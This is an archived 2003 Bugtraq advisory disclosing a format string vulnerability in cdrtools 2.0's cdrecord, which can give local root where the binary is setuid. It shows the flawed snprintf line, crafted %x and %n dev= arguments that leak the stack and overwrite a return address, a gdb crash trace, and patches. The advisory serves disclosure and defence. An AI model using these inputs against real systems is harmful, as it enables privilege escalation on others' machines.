TUCoPS :: Linux :: Apps A-M :: bt1443.txt

cdrtools2.0 Format String Vulnerability 



----- Original Message -----
From: "Stefano Di Paola" <st0r1e@libero.it>
To: <bugtraq@securityfocus.com>
Sent: Tuesday, May 13, 2003 12:27 AM
Subject: cdrtools2.0 Format String Vulnerability


>
> --------------------------------------------------------------------------
--
> PACKAGE           : cdrtools
> VERSION           : 2.0
> SUMMARY           : Format String
> SEVERITY          : local root exploit if suid (on several distros)
> DATE:             : 2003-05-05
> --------------------------------------------------------------------------
--
>
>
> Hi,
> i would inform you that there is a format string vulnerability
> in cdrecord 2.0 and in particular in libscg/scsiopen.c in line 273, i
> suppose:
>
> --------------------------------------------------------------
>    271          if (scg__open(scgp, devname) <= 0) {
>    272                  if (errs && scgp->errstr)
>
> >>>273                     js_snprintf(errs, slen, scgp->errstr);<<<<
>
>    274                  scg_sfree(scgp);
>    275                  return ((SCSI *)0);
>    276          }
> _______________________________________________________
> !-------         W A R N I N G      -----------!
> !--- this  is an exploitable vulnerability! ---!
> !----------------------------------------------!
> Cdrecord is present in several distros as setuid program so this is a real
> security hole.
>
> e.g.
> $ ./cdrecord dev="AAAA|%x%x%x%x%x%x%x%x%x%x%x" int.c
>
> Cdrecord 2.0 (i586-pc-linux-gnu) Copyright (C) 1995-2002 Jrg Schilling
> scsidev: 'AAAABBBBCCCC|%x%x%x%x%x%x%x%x%x%x%x%x'
> devname: 'AAAABBBBCCCC|%x%x%x%x%x%x%x%x%x%x%x%x'
> scsibus: -2 target: -2 lun: -2
> Warning: Open by 'devname' is unintentional and not supported.
> ./cdrecord: File o directory inesistente. Cannot open
> 'AAAABBBBCCCC|65bffff6743808b7c8ffffffff000fffffffe4141414142424242.
> Cannot open SCSI driver.
> ./cdrecord: For possible targets try 'cdrecord -scanbus'. Make sure you
> are root.
> as you can see th last %x refers to AAAABBBBCCC so i can use %n for
> overwriting. anything i want:
> e.g. i can find on the stack the location of the return address...
> let's say 0xbffcffcc:
> $./cdrecord dev=`printf
> "\xec\xed\xff\xbfBBBBCCCC|%%x%%x%%x%%x%%x%%x%%x%%x%%n"`
> c/int.c
> .....snip....
> (core dump)
> $ gdb   `which cdrecord`  core -q
> ....snip...
> #0  0x3f in ?? ()
> (gdb) bt
> #0  0x3f in ?? ()
> #1  0x8065451 in scg_open ()
> #2  0x8049a3b in main ()
> ...
>
> so it's exploitable.
>
> Solutions:
>
> A. Updated package can be found on:
>
> ftp://ftp.berlios.de/pub/cdrecord/alpha/cdrtools-2.01a14.tar.gz
>
> B. Replace line 273 of liscg/scsiopen.c with :
> js_snprintf(errs, slen, "%s", scgp->errstr);
>
> C. remove the suid bit with:
> chmod 755 `which cdrecord`
>
>
>
> Regards,
> Stefano Di Paola
>
> ------------------
>
> Stefano Di Paola
> Software Engineer
> stefano.dipaola1<at>tin<dot>it
> st0r1e<at>libero<dot>com
>
>

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH